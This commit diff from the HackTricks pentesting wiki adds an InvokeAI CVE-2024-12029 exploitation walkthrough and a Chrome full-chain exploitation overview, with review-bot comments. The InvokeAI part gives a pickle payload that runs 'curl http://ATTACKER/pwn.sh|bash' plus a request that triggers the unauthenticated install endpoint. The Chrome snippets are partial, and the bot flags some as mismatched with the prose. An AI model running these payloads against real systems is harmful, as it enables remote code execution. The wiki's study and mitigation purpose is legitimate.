
Commit 551871d

Merge branch 'master' of github.com:HackTricks-wiki/hacktricks
2 parents ef441b6 + e525e8f commit 551871d

16 files changed

Lines changed: 1030 additions & 42 deletions

File tree

searchindex.js

Lines changed: 1 addition & 1 deletion

src/AI/AI-Models-RCE.md

Lines changed: 86 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -23,10 +23,86 @@ At the time of the writting these are some examples of this type of vulneravilit
2323
| **Keras (older formats)** | *(No new CVE)* Legacy Keras H5 model | Malicious HDF5 (`.h5`) model with Lambda layer code still executes on load (Keras safe_mode doesn’t cover old format – “downgrade attack”) | |
2424
| **Others** (general) | *Design flaw* – Pickle serialization | Many ML tools (e.g., pickle-based model formats, Python `pickle.load`) will execute arbitrary code embedded in model files unless mitigated | |
2525

26-
2726
Moreover, there some python pickle based models like the ones used by [PyTorch](https://github.com/pytorch/pytorch/security) that can be used to execute arbitrary code on the system if they are not loaded with `weights_only=True`. So, any pickle based model might be specially susceptible to this type of attacks, even if they are not listed in the table above.
2827

29-
Example:
28+
### 🆕 InvokeAI RCE via `torch.load` (CVE-2024-12029)
29+
30+
`InvokeAI` is a popular open-source web interface for Stable-Diffusion. Versions **5.3.1 – 5.4.2** expose the REST endpoint `/api/v2/models/install` that lets users download and load models from arbitrary URLs.
31+
32+
Internally the endpoint eventually calls:
33+
34+
```python
35+
checkpoint = torch.load(path, map_location=torch.device("meta"))
36+
```
37+
38+
When the supplied file is a **PyTorch checkpoint (`*.ckpt`)**, `torch.load` performs a **pickle deserialization**. Because the content comes directly from the user-controlled URL, an attacker can embed a malicious object with a custom `__reduce__` method inside the checkpoint; the method is executed **during deserialization**, leading to **remote code execution (RCE)** on the InvokeAI server.
39+
40+
The vulnerability was assigned **CVE-2024-12029** (CVSS 9.8, EPSS 61.17 %).
41+
42+
#### Exploitation walk-through
43+
44+
1. Create a malicious checkpoint:
45+
46+
```python
47+
# payload_gen.py
48+
import pickle, torch, os
49+
50+
class Payload:
51+
def __reduce__(self):
52+
return (os.system, ("/bin/bash -c 'curl http://ATTACKER/pwn.sh|bash'",))
53+
54+
with open("payload.ckpt", "wb") as f:
55+
pickle.dump(Payload(), f)
56+
```
57+
58+
2. Host `payload.ckpt` on an HTTP server you control (e.g. `http://ATTACKER/payload.ckpt`).
59+
3. Trigger the vulnerable endpoint (no authentication required):
60+
61+
```python
62+
import requests
63+
64+
requests.post(
65+
"http://TARGET:9090/api/v2/models/install",
66+
params={
67+
"source": "http://ATTACKER/payload.ckpt", # remote model URL
68+
"inplace": "true", # write inside models dir
69+
# the dangerous default is scan=false → no AV scan
70+
},
71+
json={}, # body can be empty
72+
timeout=5,
73+
)
74+
```
75+
76+
4. When InvokeAI downloads the file it calls `torch.load()` → the `os.system` gadget runs and the attacker gains code execution in the context of the InvokeAI process.
77+
78+
Ready-made exploit: **Metasploit** module `exploit/linux/http/invokeai_rce_cve_2024_12029` automates the whole flow.
79+
80+
#### Conditions
81+
82+
• InvokeAI 5.3.1-5.4.2 (scan flag default **false**)
83+
`/api/v2/models/install` reachable by the attacker
84+
• Process has permissions to execute shell commands
85+
86+
#### Mitigations
87+
88+
* Upgrade to **InvokeAI ≥ 5.4.3** – the patch sets `scan=True` by default and performs malware scanning before deserialization.
89+
* When loading checkpoints programmatically use `torch.load(file, weights_only=True)` or the new [`torch.load_safe`](https://pytorch.org/docs/stable/serialization.html#security) helper.
90+
* Enforce allow-lists / signatures for model sources and run the service with least-privilege.
91+
92+
> ⚠️ Remember that **any** Python pickle-based format (including many `.pt`, `.pkl`, `.ckpt`, `.pth` files) is inherently unsafe to deserialize from untrusted sources.
93+
94+
---
95+
96+
Example of an ad-hoc mitigation if you must keep older InvokeAI versions running behind a reverse proxy:
97+
98+
```nginx
99+
location /api/v2/models/install {
100+
deny all; # block direct Internet access
101+
allow 10.0.0.0/8; # only internal CI network can call it
102+
}
103+
```
104+
105+
## Example – crafting a malicious PyTorch model
30106

31107
- Create the model:
32108

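Review bot: the nginx example at the end of this hunk blocks everyone, including the internal range it is meant to admit, because nginx evaluates `allow`/`deny` directives in order and stops at the first match; with `deny all;` written first, the following `allow 10.0.0.0/8;` is never reached. Swap the two lines (`allow 10.0.0.0/8;` then `deny all;`) so the location is reachable from the CI network and denied to everything else. Two smaller points in the same hunk: the second item under Conditions (`/api/v2/models/install` reachable by the attacker) is missing the `•` marker the other two items carry, and the Mitigations bullet links a `torch.load_safe` helper that I cannot find in the PyTorch API; please confirm it exists or drop it, since `torch.load(file, weights_only=True)` in the same bullet is the documented option. `payload_gen.py` also imports `torch` without using it.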
@@ -67,7 +143,6 @@ model.load_state_dict(torch.load("malicious_state.pth", weights_only=False))
67143
# /tmp/pwned.txt is created even if you get an error
68144
```
69145

70-
71146
## Models to Path Traversal
72147

73148
As commented in [**this blog post**](https://blog.huntr.com/pivoting-archive-slip-bugs-into-high-value-ai/ml-bounties), most models formats used by different AI frameworks are based on archives, usually `.zip`. Therefore, it might be possible to abuse these formats to perform path traversal attacks, allowing to read arbitrary files from the system where the model is loaded.
@@ -102,4 +177,11 @@ with tarfile.open("symlink_demo.model", "w:gz") as tf:
102177
tf.add(PAYLOAD) # rides the symlink
103178
```
104179

105-
{{#include ../banners/hacktricks-training.md}}
180+
## References
181+
182+
- [OffSec blog – "CVE-2024-12029 – InvokeAI Deserialization of Untrusted Data"](https://www.offsec.com/blog/cve-2024-12029/)
183+
- [InvokeAI patch commit 756008d](https://github.com/invoke-ai/invokeai/commit/756008dc5899081c5aa51e5bd8f24c1b3975a59e)
184+
- [Rapid7 Metasploit module documentation](https://www.rapid7.com/db/modules/exploit/linux/http/invokeai_rce_cve_2024_12029/)
185+
- [PyTorch – security considerations for torch.load](https://pytorch.org/docs/stable/notes/serialization.html#security)
186+
187+
{{#include ../banners/hacktricks-training.md}}
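Review bot: the PyTorch reference added here (`docs/stable/notes/serialization.html#security`) uses a different path from the link in the Mitigations bullet added earlier in this file (`docs/stable/serialization.html#security`); check which one resolves and use it in both places. Moving the banner include after the new References section is consistent with the rest of the page.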

src/SUMMARY.md

Lines changed: 4 additions & 0 deletions
@@ -283,6 +283,7 @@
283283
- [Privileged Groups](windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md)
284284
- [RDP Sessions Abuse](windows-hardening/active-directory-methodology/rdp-sessions-abuse.md)
285285
- [Resource-based Constrained Delegation](windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md)
286+
- [Sccm Management Point Relay Sql Policy Secrets](windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.md)
286287
- [Security Descriptors](windows-hardening/active-directory-methodology/security-descriptors.md)
287288
- [SID-History Injection](windows-hardening/active-directory-methodology/sid-history-injection.md)
288289
- [Silver Ticket](windows-hardening/active-directory-methodology/silver-ticket.md)
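Review bot: the new entry title `Sccm Management Point Relay Sql Policy Secrets` should capitalise the acronyms (`SCCM`, `SQL`) to match the neighbouring entries such as `RDP Sessions Abuse` and `SID-History Injection`; the file slug in the path can stay as it is.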
@@ -334,6 +335,7 @@
334335
- [Frida Tutorial 3](mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md)
335336
- [Objection Tutorial](mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md)
336337
- [Google CTF 2018 - Shall We Play a Game?](mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md)
338+
- [Insecure In App Update Rce](mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.md)
337339
- [Install Burp Certificate](mobile-pentesting/android-app-pentesting/install-burp-certificate.md)
338340
- [Intent Injection](mobile-pentesting/android-app-pentesting/intent-injection.md)
339341
- [Make APK Accept CA Certificate](mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md)
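Review bot: the new entry title `Insecure In App Update Rce` reads like an auto-generated slug; `Insecure In-App Update RCE` would match the casing of the surrounding entries (e.g. `Google CTF 2018 - Shall We Play a Game?`), with the path left unchanged.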
@@ -347,6 +349,7 @@
347349
- [Webview Attacks](mobile-pentesting/android-app-pentesting/webview-attacks.md)
348350
- [iOS Pentesting Checklist](mobile-pentesting/ios-pentesting-checklist.md)
349351
- [iOS Pentesting](mobile-pentesting/ios-pentesting/README.md)
352+
- [Air Keyboard Remote Input Injection](mobile-pentesting/ios-pentesting/air-keyboard-remote-input-injection.md)
350353
- [iOS App Extensions](mobile-pentesting/ios-pentesting/ios-app-extensions.md)
351354
- [iOS Basics](mobile-pentesting/ios-pentesting/ios-basics.md)
352355
- [iOS Basic Testing Operations](mobile-pentesting/ios-pentesting/basic-ios-testing-operations.md)
@@ -759,6 +762,7 @@
759762
- [SROP - Sigreturn-Oriented Programming](binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md)
760763
- [SROP - ARM64](binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md)
761764
- [Array Indexing](binary-exploitation/array-indexing.md)
765+
- [Chrome Exploiting](binary-exploitation/chrome-exploiting.md)
762766
- [Integer Overflow](binary-exploitation/integer-overflow.md)
763767
- [Format Strings](binary-exploitation/format-strings/README.md)
764768
- [Format Strings - Arbitrary Read Example](binary-exploitation/format-strings/format-strings-arbitrary-read-example.md)
Lines changed: 184 additions & 0 deletions
@@ -0,0 +1,184 @@
1+
# Chrome Exploiting
2+
3+
{{#include ../banners/hacktricks-training.md}}
4+
5+
> This page provides a high-level yet **practical** overview of a modern "full-chain" exploitation workflow against Google Chrome 130 based on the research series **“101 Chrome Exploitation”** (Part-0 — Preface).
6+
> The goal is to give pentesters and exploit-developers the minimum background necessary to reproduce or adapt the techniques for their own research.
7+
8+
## 1. Chrome Architecture Recap
9+
Understanding the attack surface requires knowing where code is executed and which sandboxes apply.
10+
11+
```
12+
+-------------------------------------------------------------------------+
13+
| Chrome Browser |
14+
| |
15+
| +----------------------------+ +-----------------------------+ |
16+
| | Renderer Process | | Browser/main Process | |
17+
| | [No direct OS access] | | [OS access] | |
18+
| | +----------------------+ | | | |
19+
| | | V8 Sandbox | | | | |
20+
| | | [JavaScript / Wasm] | | | | |
21+
| | +----------------------+ | | | |
22+
| +----------------------------+ +-----------------------------+ |
23+
| | IPC/Mojo | |
24+
| V | |
25+
| +----------------------------+ | |
26+
| | GPU Process | | |
27+
| | [Restricted OS access] | | |
28+
| +----------------------------+ | |
29+
+-------------------------------------------------------------------------+
30+
```
31+
32+
Layered defence-in-depth:
33+
34+
* **V8 sandbox** (Isolate): memory permissions are restricted to prevent arbitrary read/write from JITed JS / Wasm.
35+
* **Renderer ↔ Browser split** ensured via **Mojo/IPC** message passing; the renderer has *no* native FS/network access.
36+
* **OS sandboxes** further contain each process (Windows Integrity Levels / `seccomp-bpf` / macOS sandbox profiles).
37+
38+
A *remote* attacker therefore needs **three** successive primitives:
39+
40+
1. Memory corruption inside V8 to get **arbitrary RW inside the V8 heap**.
41+
2. A second bug allowing the attacker to **escape the V8 sandbox to full renderer memory**.
42+
3. A final sandbox-escape (often logic rather than memory corruption) to execute code **outside of the Chrome OS sandbox**.
43+
44+
---
45+
46+
## 2. Stage 1 – WebAssembly Type-Confusion (CVE-2025-0291)
47+
48+
A flaw in TurboFan’s **Turboshaft** optimisation mis-classifies **WasmGC reference types** when the value is produced and consumed inside a *single basic block loop*.
49+
50+
Effect:
51+
* The compiler **skips the type-check**, treating a *reference* (`externref/anyref`) as an *int64*.
52+
* Crafted Wasm allows overlapping a JS object header with attacker-controlled data → <code>addrOf()</code> & <code>fakeObj()</code> **AAW / AAR primitives**.
53+
54+
Minimal PoC (excerpt):
55+
56+
```WebAssembly
57+
(module
58+
(type $t0 (func (param externref) (result externref)))
59+
(func $f (param $p externref) (result externref)
60+
(local $l externref)
61+
block $exit
62+
loop $loop
63+
local.get $p ;; value with real ref-type
64+
;; compiler incorrectly re-uses it as int64 in the same block
65+
br_if $exit ;; exit condition keeps us single-block
66+
br $loop
67+
end
68+
end)
69+
(export "f" (func $f)))
70+
```
71+
72+
Trigger optimisation & spray objects from JS:
73+
74+
```js
75+
const wasmMod = new WebAssembly.Module(bytes);
76+
const wasmInst = new WebAssembly.Instance(wasmMod);
77+
const f = wasmInst.exports.f;
78+
79+
for (let i = 0; i < 1e5; ++i) f({}); // warm-up for JIT
80+
81+
// primitives
82+
let victim = {m: 13.37};
83+
let fake = arbitrary_data_backed_typedarray;
84+
let addrVict = addrOf(victim);
85+
```
86+
87+
Outcome: **arbitrary read/write within V8**.
88+
89+
---
90+
91+
## 3. Stage 2 – Escaping the V8 Sandbox (issue 379140430)
92+
93+
When a Wasm function is tier-up-compiled, a **JS ↔ Wasm wrapper** is generated. A signature-mismatch bug causes the wrapper to write past the end of a trusted **`Tuple2`** object when the Wasm function is re-optimised *while still on the stack*.
94+
95+
Overwriting the 2 × 64-bit fields of the `Tuple2` object yields **read/write on any address inside the Renderer process**, effectively bypassing the V8 sandbox.
96+
97+
Key steps in exploit:
98+
1. Get function into **Tier-Up** state by alternating turbofan/baseline code.
99+
2. Trigger tier-up while keeping a reference on the stack (`Function.prototype.apply`).
100+
3. Use Stage-1 AAR/AAW to find & corrupt the adjacent `Tuple2`.
101+
102+
Wrapper identification:
103+
104+
```js
105+
function wrapperGen(arg) {
106+
return f(arg);
107+
}
108+
%WasmTierUpFunction(f); // force tier-up (internals-only flag)
109+
wrapperGen(0x1337n);
110+
```
111+
112+
After corruption we possess a fully-featured **renderer R/W primitive**.
113+
114+
---
115+
116+
## 4. Stage 3 – Renderer → OS Sandbox Escape (CVE-2024-11114)
117+
118+
The **Mojo** IPC interface `blink.mojom.DragService.startDragging()` can be called from the Renderer with *partially trusted* parameters. By crafting a `DragData` structure pointing to an **arbitrary file path** the renderer convinces the browser to perform a *native* drag-and-drop **outside the renderer sandbox**.
119+
120+
Abusing this we can programmatically “drag” a malicious EXE (previously dropped in a world-writable location) onto the Desktop, where Windows automatically executes certain file-types once dropped.
121+
122+
Example (simplified):
123+
124+
```js
125+
const payloadPath = "C:\\Users\\Public\\explorer.exe";
126+
127+
chrome.webview.postMessage({
128+
type: "DragStart",
129+
data: {
130+
title: "MyFile",
131+
file_path: payloadPath,
132+
mime_type: "application/x-msdownload"
133+
}
134+
});
135+
```
136+
137+
No additional memory corruption is necessary – the **logic flaw** gives us arbitrary file execution with the user’s privileges.
138+
139+
---
140+
141+
## 5. Full Chain Flow
142+
143+
1. **User visits** malicious webpage.
144+
2. **Stage 1**: Wasm module abuses CVE-2025-0291 → V8 heap AAR/AAW.
145+
3. **Stage 2**: Wrapper mismatch corrupts `Tuple2` → escape V8 sandbox.
146+
4. **Stage 3**: `startDragging()` IPC → escape OS sandbox & execute payload.
147+
148+
Result: **Remote Code Execution (RCE)** on the host (Chrome 130, Windows/Linux/macOS).
149+
150+
---
151+
152+
## 6. Lab & Debugging Setup
153+
154+
```bash
155+
# Spin-up local HTTP server w/ PoCs
156+
npm i -g http-server
157+
git clone https://github.com/Petitoto/chromium-exploit-dev
158+
cd chromium-exploit-dev
159+
http-server -p 8000 -c -1
160+
161+
# Windows kernel debugging
162+
"C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\windbgx.exe" -symbolpath srv*C:\symbols*https://msdl.microsoft.com/download/symbols
163+
```
164+
165+
Useful flags when launching a *development* build of Chrome:
166+
167+
```bash
168+
chrome.exe --no-sandbox --disable-gpu --single-process --js-flags="--allow-natives-syntax"
169+
```
170+
171+
---
172+
173+
## Takeaways
174+
175+
* **WebAssembly JIT bugs** remain a reliable entry-point – the type system is still young.
176+
* Obtaining a second memory-corruption bug inside V8 (e.g. wrapper mismatch) greatly simplifies **V8-sandbox escape**.
177+
* Logic-level weaknesses in privileged Mojo IPC interfaces are often sufficient for a **final sandbox escape** – keep an eye on *non-memory* bugs.
178+
179+
180+
181+
## References
182+
* [101 Chrome Exploitation — Part 0 (Preface)](https://opzero.ru/en/press/101-chrome-exploitation-part-0-preface/)
183+
* [Chromium security architecture](https://chromium.org/developers/design-documents/security)
184+
{{#include ../banners/hacktricks-training.md}}
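Review bot: the Stage 3 snippet does not exercise the interface the text describes: the prose says the escape goes through the Mojo method `blink.mojom.DragService.startDragging()`, but the code calls `chrome.webview.postMessage({type: "DragStart", ...})`, a WebView2 host-messaging API unrelated to Mojo, so a reader cannot map the code to the description. Either label the block as illustrative pseudocode or replace it with the actual IPC call. Related consistency points in the same hunk: Stage 3 drops an EXE onto a Windows Desktop, yet section 5 states the result as RCE on "Windows/Linux/macOS"; the claim that Windows "automatically executes certain file-types once dropped" needs a citation, as the only reference given is the Part-0 preface; the Stage 1 JS uses `bytes`, `arbitrary_data_backed_typedarray` and `addrOf` without defining them, so say they are placeholders; and the module fence is tagged `WebAssembly`, whereas `wat` is the conventional tag for text-format modules. There are also three consecutive blank lines before the References heading.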
